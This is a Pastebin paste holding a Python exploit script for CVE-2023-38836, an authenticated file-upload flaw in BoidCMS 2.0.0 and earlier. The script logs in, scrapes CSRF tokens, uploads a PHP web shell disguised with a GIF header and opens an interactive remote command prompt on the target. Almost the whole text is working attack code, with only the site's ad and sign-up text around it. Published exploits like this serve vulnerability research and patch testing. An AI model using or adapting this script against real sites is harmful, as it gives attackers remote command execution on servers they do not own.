Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
- # Date: 08/21/2023
- # Exploit Author: 1337kid
- # Vendor Homepage: https://boidcms.github.io/#/
- # Software Link: https://boidcms.github.io/BoidCMS.zip
- # Version: <= 2.0.0
- # Tested on: Ubuntu
- # CVE : CVE-2023-38836
- import requests
- import re
- import argparse
- parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
- parser.add_argument("-u", "--url", help="website url")
- parser.add_argument("-l", "--user", help="admin username")
- parser.add_argument("-p", "--passwd", help="admin password")
- args = parser.parse_args()
- base_url=args.url
- user=args.user
- passwd=args.passwd
- def showhelp():
- print(parser.print_help())
- exit()
- if base_url == None: showhelp()
- elif user == None: showhelp()
- elif passwd == None: showhelp()
- with requests.Session() as s:
- req=s.get(f'{base_url}/admin')
- token=re.findall('[a-z0-9]{64}',req.text)
- form_login_data={
- "username":user,
- "password":passwd,
- "login":"Login",
- }
- form_login_data['token']=token
- s.post(f'{base_url}/admin',data=form_login_data)
- #=========== File upload to RCE
- req=s.get(f'{base_url}/admin?page=media')
- token=re.findall('[a-z0-9]{64}',req.text)
- form_upld_data={
- "token":token,
- "upload":"Upload"
- }
- #==== php shell
- php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
- with open('shell.php','w') as f:
- f.writelines(php_code)
- #====
- file = {'file' : open('shell.php','rb')}
- s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
- req=s.get(f'{base_url}/media/shell.php')
- if req.status_code == '404':
- print("Upload failed")
- exit()
- print(f'Shell uploaded to "{base_url}/media/shell.php"')
- while 1:
- cmd=input("cmd >> ")
- if cmd=='exit': exit()
- req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
- print(req.text)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
